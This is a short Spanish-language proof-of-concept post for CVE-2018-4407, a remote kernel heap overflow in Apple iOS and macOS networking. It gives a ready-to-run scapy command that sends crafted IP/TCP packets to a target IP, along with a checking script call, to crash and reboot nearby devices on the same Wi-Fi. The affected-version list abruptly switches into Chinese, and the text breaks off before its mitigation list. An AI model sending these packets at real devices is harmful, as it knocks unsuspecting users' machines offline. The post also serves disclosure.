
iOS 12 / OS X Desbordamiento de montón del kernel remoto (CVE-2018-4407) POC
iOS 12 / OS X Desbordamiento de montón del kernel remoto (CVE-2018-4407) POC:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
O usar el script
python check_icmp_dos.py 127.0.0.1
Esta vulnerabilidad permite que un atacante, simplemente conectándose a la misma red Wi-Fi, envíe paquetes maliciosos a otros usuarios desprevenidos para provocar el bloqueo y reinicio de cualquier dispositivo Mac o iOS. Dado que la vulnerabilidad reside en el código central de la red del sistema, ningún software antivirus puede defenderse de ella.
Los dispositivos que ejecutan los siguientes sistemas operativos son vulnerables:
Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)
Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)
Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)
Apple OS X El Capitan及更早版本:所有设备
Actualmente, Apple ha lanzado la actualización iOS 12.1 que corrige esta vulnerabilidad. Se recomienda a los usuarios verificar la versión del sistema y, si están afectados, tomar medidas de mitigación de inmediato. Las medidas de mitigación son las siguientes: